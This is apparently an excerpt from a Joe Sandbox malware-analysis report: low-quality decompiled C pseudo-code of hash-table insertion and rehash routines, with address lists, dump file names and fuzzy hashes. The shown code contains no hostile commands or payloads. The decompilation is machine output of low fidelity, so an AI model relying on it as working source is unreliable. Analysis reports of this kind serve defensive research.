					_t143[2] =  *( *_a16);
					_t143[3] = 0;
					_t143[4] = 0;
					_t143[5] = 0;
					_t143[1] = _v24;
					 *_t143 = 0;
					asm("movq xmm2, [0x110dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [esi+0x10]");
					_t209 = _v28;
					__eflags = _t209;
					if(__eflags == 0) {
						L19:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t215 = _t209;
						_t105 = E001036A0(_t146);
						_v44 = _t230;
						asm("movss xmm0, [ebp-0x28]");
						asm("cvttss2si eax, xmm0");
						asm("subss xmm0, [0x110dd8]");
						asm("cvttss2si ecx, xmm0");
						_t148 = _t146 & _t105 >> 0x0000001f | _t105;
						_t176 = _t209 + _t209;
						_t106 = 1;
						__eflags = _t209 - 3;
						if(_t209 >= 3) {
							_t209 = _t215 - 1;
							__eflags = _t215 & _t209;
							_t53 = (_t215 & _t209) != 0;
							__eflags = _t53;
							_t106 = 0 | _t53;
						}
						_t107 = _t106 | _t176;
						__eflags = _t107 - _t148;
						_t108 =  <=  ? _t148 : _t107;
						_t216 = 2;
						__eflags = _t108 - 1;
						if(_t108 != 1) {
							_t54 = _t108 - 1; // 0x0
							_t148 = _t54;
							__eflags = _t108 & _t148;
							if((_t108 & _t148) != 0) {
								 *_t219 = _t108;
								_t108 = E0007A3AC(_t143, _t209);
							}
							_t216 = _t108;
						}
						_t210 =  *(_v20 + 4);
						__eflags = _t216 - _t210;
						if(__eflags > 0) {
							L34:
							 *_t219 = _t216;
							E000CA2C0(_v20);
							goto L35;
						} else {
							if(__eflags >= 0) {
								L35:
								_t214 = _v20;
								_t209 =  *(_t214 + 4);
								_t177 = _t209 - 1;
								__eflags = _t209 & _t177;
								if((_t209 & _t177) != 0) {
									_t111 = _v24;
									__eflags = _t111 - _t209;
									if(_t111 >= _t209) {
										_t71 = _t111 % _t209;
										__eflags = _t71;
										_t179 = _t71;
									} else {
										_t179 = _t111;
									}
								} else {
									_t179 = _t177 & _v24;
								}
								L40:
								_t114 =  *( *_t214 + _t179 * 4);
								__eflags = _t114;
								if(_t114 == 0) {
									_t77 = _t214 + 8; // 0x8
									 *_t143 =  *(_t214 + 8);
									 *(_t214 + 8) = _t143;
									 *( *_t214 + _t179 * 4) = _t77;
									_t116 =  *_t143;
									__eflags = _t116;
									_t217 = _a4;
									if(_t116 == 0) {
										L49:
										_t117 = _v32;
										 *_t117 =  *_t117 + 1;
										__eflags =  *_t117;
										_t118 = 1;
										L50:
										 *_t217 = _t143;
										_t217[1] = _t118;
										return _t217;
									}
									_t120 =  *(_t116 + 4);
									_t152 = _t209 - 1;
									__eflags = _t209 & _t152;
									if((_t209 & _t152) != 0) {
										__eflags = _t120 - _t209;
										if(_t120 >= _t209) {
											_t88 = _t120 % _t209;
											__eflags = _t88;
											_t120 = _t88;
										}
									} else {
										_t120 = _t120 & _t152;
									}
									_t114 = (_t120 << 2) +  *_v20;
									__eflags = _t114;
									L48:
									 *_t114 = _t143;
									goto L49;
								}
								 *_t143 =  *_t114;
								_t217 = _a4;
								goto L48;
							}
							asm("movss xmm0, [eax+0xc]");
							asm("orpd xmm0, [0x110de0]");
							asm("subsd xmm0, [0x110dd0]");
							asm("cvtsd2ss xmm0, xmm0");
							asm("divss xmm0, [eax+0x10]");
							asm("cvtss2sd xmm0, xmm0");
							asm("movsd [esp], xmm0");
							_t124 = E001036A0(_t148);
							_v40 = _t230;
							asm("movss xmm0, [ebp-0x24]");
							asm("cvttss2si ecx, xmm0");
							asm("subss xmm0, [0x110dd8]");
							asm("cvttss2si eax, xmm0");
							_t126 = _t124 & _t148 >> 0x0000001f | _t148;
							__eflags = _t210 - 3;
							if(_t210 < 3) {
								L32:
								 *_t219 = _t126;
								_t126 = E0007A3AC(_t143, _t210);
								L33:
								__eflags = _t216 - _t126;
								_t216 =  <=  ? _t126 : _t216;
								__eflags = _t216 - _t210;
								if(_t216 >= _t210) {
									goto L35;
								}
								goto L34;
							}
							_t161 = (((_t210 - (_t210 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t210 - (_t210 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t210 - (_t210 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t210 - (_t210 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							__eflags = _t161 - 1;
							if(_t161 > 1) {
								goto L32;
							}
							__eflags = _t126 - 2;
							if(_t126 >= 2) {
								asm("bsr ecx, eax");
								_t126 = 1 <<  ~(_t161 ^ 0x0000001f);
							}
							goto L33;
						}
					}
					asm("movd xmm3, edi");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags > 0) {
						goto L19;
					}
					_t179 = _v36;
					goto L40;
				}
				_t212 = (((_t142 - (_t142 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t142 - (_t142 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t142 - (_t142 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t142 - (_t142 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
				if(_t212 > 1) {
					_t164 = _v24;
					_t202 = _t164;
					__eflags = _t164 - _t142;
					if(_t164 >= _t142) {
						_t12 = _t164 % _v28;
						__eflags = _t12;
						_t202 = _t12;
					}
				} else {
					_t164 = _v24;
					_t202 = _t142 - 0x00000001 & _t164;
				}
				_v36 = _t202;
				_t144 =  *( *_v20 + _t202 * 4);
				if(_t144 == 0) {
					goto L16;
				}
				_t203 = _v28;
				_v32 = _t203 - 1;
				while(1) {
					_t143 =  *_t144;
					if(_t143 == 0) {
						goto L16;
					}
					_t138 = _t143[1];
					if(_t138 == _t164) {
						L10:
						if(_t143[2] == _t213) {
							_t118 = 0;
							_t217 = _a4;
							goto L50;
						}
						continue;
					}
					if(_t212 <= 1) {
						_t138 = _t138 & _v32;
						__eflags = _t138;
					} else {
						if(_t138 >= _t203) {
							_t138 = _t138 % _v28;
							_t203 = _v28;
						}
					}
					if(_t138 != _v36) {
						goto L16;
					} else {
						goto L10;
					}
				}
				goto L16;
			}

0x000cb350
0x000cb359
0x000cb35f
0x000cb38d
0x000cb390
0x000cb395
0x000cb398
0x000cb3df
0x000cb453
0x000cb456
0x000cb459
0x000cb45c
0x000cb463
0x000cb466
0x000cb46b
0x000cb46e
0x000cb474
0x000cb477
0x000cb47e
0x000cb485
0x000cb48f
0x000cb492
0x000cb49c
0x000cb4a4
0x000cb4a8
0x000cb4ac
0x000cb4b0
0x000cb4b4
0x000cb4b9
0x000cb4bc
0x000cb4be
0x000cb4e4
0x000cb4e4
0x000cb4e8
0x000cb4ec
0x000cb4f1
0x000cb4f3
0x000cb4f8
0x000cb4fb
0x000cb500
0x000cb506
0x000cb511
0x000cb517
0x000cb519
0x000cb51c
0x000cb521
0x000cb524
0x000cb526
0x000cb52b
0x000cb52d
0x000cb52d
0x000cb52d
0x000cb52d
0x000cb530
0x000cb532
0x000cb534
0x000cb537
0x000cb53c
0x000cb53f
0x000cb541
0x000cb541
0x000cb544
0x000cb546
0x000cb548
0x000cb54b
0x000cb54b
0x000cb550
0x000cb550
0x000cb555
0x000cb558
0x000cb55a
0x000cb629
0x000cb629
0x000cb62f
0x00000000
0x000cb560
0x000cb560
0x000cb637
0x000cb637
0x000cb63a
0x000cb63d
0x000cb640
0x000cb642
0x000cb649
0x000cb64c
0x000cb64e
0x000cb656
0x000cb656
0x000cb656
0x000cb650
0x000cb650
0x000cb650
0x000cb644
0x000cb644
0x000cb644
0x000cb658
0x000cb65a
0x000cb65d
0x000cb65f
0x000cb66a
0x000cb670
0x000cb672
0x000cb677
0x000cb67a
0x000cb67c
0x000cb67e
0x000cb681
0x000cb6a5
0x000cb6a5
0x000cb6a8
0x000cb6a8
0x000cb6aa
0x000cb6ac
0x000cb6ac
0x000cb6ae
0x000cb6ba
0x000cb6ba
0x000cb683
0x000cb686
0x000cb689
0x000cb68b
0x000cb691
0x000cb693
0x000cb697
0x000cb697
0x000cb699
0x000cb699
0x000cb68d
0x000cb68d
0x000cb68d
0x000cb6a1
0x000cb6a1
0x000cb6a3
0x000cb6a3
0x00000000
0x000cb6a3
0x000cb663
0x000cb665
0x00000000
0x000cb665
0x000cb569
0x000cb56e
0x000cb576
0x000cb57e
0x000cb582
0x000cb587
0x000cb58b
0x000cb590
0x000cb595
0x000cb598
0x000cb59d
0x000cb5a3
0x000cb5ab
0x000cb5b4
0x000cb5b6
0x000cb5b9
0x000cb618
0x000cb618
0x000cb61b
0x000cb620
0x000cb620
0x000cb622
0x000cb625
0x000cb627
0x00000000
0x00000000
0x00000000
0x000cb627
0x000cb5ef
0x000cb5f2
0x000cb5f5
0x00000000
0x00000000
0x000cb5f7
0x000cb5fa
0x000cb5fd
0x000cb60a
0x000cb60a
0x00000000
0x000cb5fa
0x000cb55a
0x000cb4c0
0x000cb4c4
0x000cb4c8
0x000cb4cc
0x000cb4cf
0x000cb4d3
0x000cb4d7
0x000cb4da
0x00000000
0x00000000
0x000cb4dc
0x00000000
0x000cb4dc
0x000cb3cd
0x000cb3d3
0x000cb3e8
0x000cb3eb
0x000cb3ed
0x000cb3ef
0x000cb3f5
0x000cb3f5
0x000cb3f5
0x000cb3f5
0x000cb3d5
0x000cb3d8
0x000cb3db
0x000cb3db
0x000cb3fd
0x000cb400
0x000cb405
0x00000000
0x00000000
0x000cb407
0x000cb40d
0x000cb431
0x000cb431
0x000cb435
0x00000000
0x00000000
0x000cb437
0x000cb43c
0x000cb428
0x000cb42b
0x000cb60e
0x000cb610
0x00000000
0x000cb610
0x00000000
0x000cb42b
0x000cb441
0x000cb420
0x000cb420
0x000cb443
0x000cb445
0x000cb44c
0x000cb44e
0x000cb44e
0x000cb445
0x000cb426
0x00000000
0x00000000
0x00000000
0x00000000
0x000cb426
0x00000000

APIs

__floor_pentium4.LIBCMT ref: 000CB4F3
__floor_pentium4.LIBCMT ref: 000CB590

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: db54a71eba006d13b2609a00c713db70d8916e4837490e4a07d32a25f1cb4243
Instruction ID: 571f771e0101f4abbdc5c3527836d8d8894d29b4d34dc8213889ee724584f381
Opcode Fuzzy Hash: db54a71eba006d13b2609a00c713db70d8916e4837490e4a07d32a25f1cb4243
Instruction Fuzzy Hash: 5DB1B171E146058FCB19CF69C882B6EB7F2AFD9310F18C62DD816AB355E734E9818B41

Uniqueness

Uniqueness Score: -1.00%

Function 000AF530 Relevance: 3.3, APIs: 2, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E000AF530(signed int __ecx, intOrPtr __fp0, signed int** _a4, intOrPtr* _a8, signed int** _a16) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t109;
				signed int* _t110;
				signed int _t112;
				signed int _t115;
				signed int _t117;
				unsigned int _t126;
				signed int _t130;
				signed int* _t134;
				signed int** _t135;
				signed int _t136;
				signed int _t137;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int _t159;
				signed int _t183;
				unsigned int _t188;
				unsigned int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed int** _t194;
				signed int _t195;
				signed int* _t197;
				intOrPtr _t208;

				_t208 = __fp0;
				_t136 = __ecx;
				_v20 =  *_a8;
				_t188 =  *(__ecx + 4);
				_v24 = __ecx;
				if(_t188 == 0) {
					_t191 = 0xffffffff;
					L17:
					 *_t197 = 0x10;
					_t134 = L000DDBBC();
					_t134[2] =  *( *_a16);
					_t134[3] = 0;
					_t134[1] = _v20;
					 *_t134 = 0;
					_t137 = _v24;
					asm("movq xmm2, [0x110dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [ecx+0x10]");
					__eflags = _t188;
					if(__eflags == 0) {
						L19:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t98 = E001036A0(_t137);
						_v40 = _t208;
						asm("movss xmm0, [ebp-0x24]");
						asm("cvttss2si eax, xmm0");
						asm("subss xmm0, [0x110dd8]");
						asm("cvttss2si ecx, xmm0");
						_t139 = _t137 & _t98 >> 0x0000001f | _t98;
						_t154 = _t188 + _t188;
						_t99 = 1;
						__eflags = _t188 - 3;
						if(_t188 >= 3) {
							_t40 = _t188 - 1; // 0x10f0bb
							_t195 = _t40;
							__eflags = _t188 & _t195;
							_t44 = (_t188 & _t195) != 0;
							__eflags = _t44;
							_t99 = 0 | _t44;
						}
						_t100 = _t99 | _t154;
						__eflags = _t100 - _t139;
						_t101 =  <=  ? _t139 : _t100;
						_t192 = 2;
						__eflags = _t101 - 1;
						if(_t101 != 1) {
							_t46 = _t101 - 1; // 0x0
							_t140 = _t46;
							__eflags = _t101 & _t140;
							if((_t101 & _t140) != 0) {
								 *_t197 = _t101;
								_t192 = E0007A3AC(_t134, _t188);
								_t141 = _v24;
								_t188 =  *(_t141 + 4);
							} else {
								_t192 = _t101;
								_t141 = _v24;
							}
						} else {
							_t141 = _v24;
						}
						_t155 = _v20;
						__eflags = _t192 - _t188;
						if(__eflags > 0) {
							L35:
							 *_t197 = _t192;
							L0009DCB0(_t141, _t208);
							_t155 = _v20;
							_t141 = _v24;
							goto L36;
						} else {
							if(__eflags >= 0) {
								L36:
								_t188 =  *(_t141 + 4);
								_t60 = _t188 - 1; // 0x10f0bb
								_t193 = _t60;
								__eflags = _t188 & _t193;
								if((_t188 & _t193) != 0) {
									__eflags = _t155 - _t188;
									if(_t155 >= _t188) {
										_t64 = _t155 % _t188;
										__eflags = _t64;
										_t191 = _t64;
										_t141 = _v24;
									} else {
										_t191 = _t155;
									}
								} else {
									_t191 = _t193 & _t155;
								}
								L41:
								_t158 =  *_t141;
								_t106 =  *(_t158 + _t191 * 4);
								__eflags = _t106;
								if(_t106 == 0) {
									 *_t134 =  *(_t141 + 8);
									 *(_t141 + 8) = _t134;
									 *(_t158 + _t191 * 4) = _t141 + 8;
									_t109 =  *_t134;
									__eflags = _t109;
									_t194 = _a4;
									if(_t109 == 0) {
										L50:
										_t86 = _t141 + 0xc;
										 *_t86 =  *(_t141 + 0xc) + 1;
										__eflags =  *_t86;
										_t110 = 1;
										goto L51;
									}
									_t112 =  *(_t109 + 4);
									_t78 = _t188 - 1; // 0x10f0bb
									_t159 = _t78;
									__eflags = _t188 & _t159;
									if((_t188 & _t159) != 0) {
										__eflags = _t112 - _t188;
										if(_t112 >= _t188) {
											_t82 = _t112 % _t188;
											__eflags = _t82;
											_t112 = _t82;
											_t141 = _v24;
										}
									} else {
										_t112 = _t112 & _t159;
									}
									_t106 = (_t112 << 2) +  *_t141;
									__eflags = _t106;
									L49:
									 *_t106 = _t134;
									goto L50;
								}
								 *_t134 =  *_t106;
								_t194 = _a4;
								goto L49;
							}
							asm("movss xmm0, [ecx+0xc]");
							asm("orpd xmm0, [0x110de0]");
							asm("subsd xmm0, [0x110dd0]");
							asm("cvtsd2ss xmm0, xmm0");
							asm("divss xmm0, [ecx+0x10]");
							asm("cvtss2sd xmm0, xmm0");
							asm("movsd [esp], xmm0");
							_t115 = E001036A0(_t141);
							_v36 = _t208;
							asm("movss xmm0, [ebp-0x20]");
							asm("cvttss2si ecx, xmm0");
							asm("subss xmm0, [0x110dd8]");
							asm("cvttss2si eax, xmm0");
							_t117 = _t115 & _t141 >> 0x0000001f | _t141;
							__eflags = _t188 - 3;
							if(_t188 < 3) {
								L33:
								 *_t197 = _t117;
								_t117 = E0007A3AC(_t134, _t188);
								L34:
								_t141 = _v24;
								_t155 = _v20;
								__eflags = _t192 - _t117;
								_t192 =  <=  ? _t117 : _t192;
								__eflags = _t192 - _t188;
								if(_t192 >= _t188) {
									goto L36;
								}
								goto L35;
							}
							_t148 = (((_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							__eflags = _t148 - 1;
							if(_t148 > 1) {
								goto L33;
							}
							__eflags = _t117 - 2;
							if(_t117 >= 2) {
								asm("bsr ecx, eax");
								_t117 = 1 <<  ~(_t148 ^ 0x0000001f);
							}
							goto L34;
						}
					}
					asm("movd xmm3, edi");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags <= 0) {
						goto L41;
					}
					goto L19;
				} else {
					_t126 = _t188;
					_t190 = (((_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
					_v28 = _t126;
					if(_t190 > 1) {
						_t183 = _v20;
						_t191 = _t183;
						__eflags = _t183 - _t126;
						if(_t183 >= _t126) {
							_t11 = _t183 % _v28;
							__eflags = _t11;
							_t191 = _t11;
							_t183 = _v20;
							_t136 = _v24;
						}
					} else {
						_t6 = _t126 - 1; // 0x10f0bb
						_t183 = _v20;
						_t191 = _t6 & _t183;
					}
					_t135 =  *( *_t136 + _t191 * 4);
					if(_t135 == 0) {
						L16:
						_t188 = _v28;
						goto L17;
					}
					_v32 = _v28 - 1;
					_t151 = _v28;
					while(1) {
						_t134 =  *_t135;
						if(_t134 == 0) {
							goto L16;
						}
						_t24 =  &(_t134[1]); // 0xc683ce89
						_t130 =  *_t24;
						if(_t130 == _t183) {
							L10:
							if(_t134[2] == _t183) {
								_t110 = 0;
								_t194 = _a4;
								L51:
								 *_t194 = _t134;
								_t194[1] = _t110;
								return _t194;
							}
							continue;
						}
						if(_t190 <= 1) {
							_t130 = _t130 & _v32;
							__eflags = _t130;
						} else {
							if(_t130 >= _t151) {
								_t130 = _t130 % _t151;
								_t183 = _v20;
							}
						}
						if(_t130 != _t191) {
							goto L16;
						} else {
							goto L10;
						}
					}
					goto L16;
				}
			}

0x000af530
0x000af530
0x000af53e
0x000af541
0x000af546
0x000af549
0x000af595
0x000af604
0x000af604
0x000af610
0x000af619
0x000af61c
0x000af626
0x000af629
0x000af62f
0x000af636
0x000af63e
0x000af642
0x000af646
0x000af64a
0x000af64e
0x000af653
0x000af655
0x000af677
0x000af677
0x000af67b
0x000af67f
0x000af684
0x000af689
0x000af68c
0x000af691
0x000af697
0x000af6a2
0x000af6a8
0x000af6aa
0x000af6ad
0x000af6b2
0x000af6b5
0x000af6b7
0x000af6b7
0x000af6bc
0x000af6be
0x000af6be
0x000af6be
0x000af6be
0x000af6c1
0x000af6c3
0x000af6c5
0x000af6c8
0x000af6cd
0x000af6d0
0x000af6d7
0x000af6d7
0x000af6da
0x000af6dc
0x000af6ef
0x000af6f7
0x000af6f9
0x000af6fc
0x000af6de
0x000af6de
0x000af6e0
0x000af6e0
0x000af6d2
0x000af6d2
0x000af6d2
0x000af6ff
0x000af702
0x000af704
0x000af7cc
0x000af7cc
0x000af7cf
0x000af7d7
0x000af7da
0x00000000
0x000af70a
0x000af70a
0x000af7dd
0x000af7dd
0x000af7e0
0x000af7e0
0x000af7e3
0x000af7e5
0x000af7eb
0x000af7ed
0x000af7f7
0x000af7f7
0x000af7f9
0x000af7fb
0x000af7ef
0x000af7ef
0x000af7ef
0x000af7e7
0x000af7e7
0x000af7e7
0x000af7fe
0x000af7fe
0x000af800
0x000af803
0x000af805
0x000af813
0x000af818
0x000af81b
0x000af81e
0x000af820
0x000af822
0x000af825
0x000af849
0x000af849
0x000af849
0x000af849
0x000af84c
0x00000000
0x000af84c
0x000af827
0x000af82a
0x000af82a
0x000af82d
0x000af82f
0x000af835
0x000af837
0x000af83b
0x000af83b
0x000af83d
0x000af83f
0x000af83f
0x000af831
0x000af831
0x000af831
0x000af845
0x000af845
0x000af847
0x000af847
0x00000000
0x000af847
0x000af809
0x000af80b
0x00000000
0x000af80b
0x000af710
0x000af715
0x000af71d
0x000af725
0x000af729
0x000af72e
0x000af732
0x000af737
0x000af73c
0x000af73f
0x000af744
0x000af74a
0x000af752
0x000af75b
0x000af75d
0x000af760
0x000af7b5
0x000af7b5
0x000af7b8
0x000af7bd
0x000af7bd
0x000af7c0
0x000af7c3
0x000af7c5
0x000af7c8
0x000af7ca
0x00000000
0x00000000
0x00000000
0x000af7ca
0x000af796
0x000af799
0x000af79c
0x00000000
0x00000000
0x000af79e
0x000af7a1
0x000af7a4
0x000af7b1
0x000af7b1
0x00000000
0x000af7a1
0x000af704
0x000af657
0x000af65b
0x000af65f
0x000af663
0x000af666
0x000af66a
0x000af66e
0x000af671
0x00000000
0x00000000
0x00000000
0x000af54b
0x000af578
0x000af580
0x000af586
0x000af589
0x000af59c
0x000af59f
0x000af5a1
0x000af5a3
0x000af5a9
0x000af5a9
0x000af5ac
0x000af5ae
0x000af5b1
0x000af5b1
0x000af58b
0x000af58b
0x000af58e
0x000af591
0x000af591
0x000af5b6
0x000af5bb
0x000af601
0x000af601
0x00000000
0x000af601
0x000af5c1
0x000af5c4
0x000af5e0
0x000af5e0
0x000af5e4
0x00000000
0x00000000
0x000af5e6
0x000af5e6
0x000af5eb
0x000af5d7
0x000af5da
0x000af6e5
0x000af6e7
0x000af84e
0x000af84e
0x000af850
0x000af85c
0x000af85c
0x00000000
0x000af5da
0x000af5f0
0x000af5d0
0x000af5d0
0x000af5f2
0x000af5f4
0x000af5fa
0x000af5fc
0x000af5fc
0x000af5f4
0x000af5d5
0x00000000
0x00000000
0x00000000
0x00000000
0x000af5d5
0x00000000
0x000af5e0

APIs

__floor_pentium4.LIBCMT ref: 000AF684
__floor_pentium4.LIBCMT ref: 000AF737

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 655023f3c3fa4ddc2ef56a782aafcd2a4188175dc78c4f4a4bce2664d786e153
Instruction ID: fb181fc47333b33499824df807a226f0f676e7f6cee984409965a0578d75a0b4
Opcode Fuzzy Hash: 655023f3c3fa4ddc2ef56a782aafcd2a4188175dc78c4f4a4bce2664d786e153
Instruction Fuzzy Hash: F2A1B476F045168FCB15CEE9C88067EB7B2AFDA310B29C669D815AB354E731EC81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000DD1E0 Relevance: 3.3, APIs: 2, Instructions: 270
COMMONCrypto

Download Yara Rule

C-Code - Quality: 27%

			E000DD1E0(signed int __ecx, intOrPtr __fp0, signed int** _a4, signed int* _a8, signed int* _a12) {
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t101;
				signed int* _t102;
				signed int _t104;
				signed int _t110;
				signed int _t112;
				signed int _t125;
				void* _t128;
				signed int _t132;
				signed int* _t133;
				signed int** _t134;
				signed int _t135;
				signed int _t137;
				signed int _t139;
				intOrPtr _t140;
				signed int _t141;
				signed int _t150;
				unsigned int _t161;
				intOrPtr* _t162;
				signed int _t165;
				signed int _t186;
				intOrPtr _t187;
				unsigned int _t188;
				signed int _t189;
				unsigned int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int** _t196;
				signed int _t197;
				signed int* _t199;
				intOrPtr _t210;

				_t210 = __fp0;
				_t135 = __ecx;
				_v20 = __ecx;
				_t132 =  *( *_a8 + 0xc);
				_t161 =  *(__ecx + 4);
				_v24 = _t161;
				_v28 = _t132;
				if(_t161 == 0) {
					_t193 = 0xffffffff;
					L16:
					 *_t199 = 0xc;
					_t133 = L000DDBBC();
					_t133[2] =  *_a12;
					_t133[1] = _v28;
					 *_t133 = 0;
					_t162 = _v20;
					asm("movq xmm2, [0x110dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [edx+0x10]");
					_t186 = _v24;
					__eflags = _t186;
					if(__eflags == 0) {
						L18:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t93 = E001036A0(_t135);
						_v40 = _t210;
						asm("movss xmm0, [ebp-0x24]");
						asm("cvttss2si eax, xmm0");
						asm("subss xmm0, [0x110dd8]");
						asm("cvttss2si ecx, xmm0");
						_t137 = _t135 & _t93 >> 0x0000001f | _t93;
						_t165 = _t186 + _t186;
						_t94 = 1;
						__eflags = _t186 - 3;
						if(_t186 >= 3) {
							_t197 = _t186 - 1;
							__eflags = _t186 & _t197;
							_t42 = (_t186 & _t197) != 0;
							__eflags = _t42;
							_t94 = 0 | _t42;
						}
						_t95 = _t94 | _t165;
						__eflags = _t95 - _t137;
						_t96 =  <=  ? _t137 : _t95;
						_t194 = 2;
						__eflags = _t96 - 1;
						_t187 = _v20;
						if(_t96 != 1) {
							_t44 = _t96 - 1; // -1
							_t137 = _t44;
							__eflags = _t96 & _t137;
							if((_t96 & _t137) != 0) {
								 *_t199 = _t96;
								_t96 = E0007A3AC(_t133, _t187);
								_t187 = _v20;
							}
							_t194 = _t96;
						}
						_t48 = _t187 + 4; // 0x7d8b0870
						_t188 =  *_t48;
						__eflags = _t194 - _t188;
						if(__eflags > 0) {
							L33:
							 *_t199 = _t194;
							L0009DCB0(_v20, _t210);
							goto L34;
						} else {
							if(__eflags >= 0) {
								L34:
								_t162 = _v20;
								_t54 = _t162 + 4; // 0x7d8b0870
								_t139 =  *_t54;
								_t55 = _t139 - 1; // 0x7d8b086f
								_t195 = _t55;
								__eflags = _t139 & _t195;
								_v24 = _t139;
								if((_t139 & _t195) != 0) {
									_t193 = _v28;
									__eflags = _t193 - _t139;
									if(_t193 >= _t139) {
										_t62 = _t193 % _t139;
										__eflags = _t62;
										_t193 = _t62;
									}
								} else {
									_t193 = _t195 & _v28;
								}
								L38:
								_t140 =  *_t162;
								_t98 =  *(_t140 + _t193 * 4);
								__eflags = _t98;
								if(_t98 == 0) {
									_t68 = _t162 + 8; // 0x74fe3908
									 *_t133 =  *_t68;
									_t69 = _t162 + 8; // 0xdd1a8
									 *(_t162 + 8) = _t133;
									 *(_t140 + _t193 * 4) = _t69;
									_t101 =  *_t133;
									__eflags = _t101;
									_t196 = _a4;
									if(_t101 == 0) {
										L47:
										_t83 = _t162 + 0xc;
										 *_t83 =  *(_t162 + 0xc) + 1;
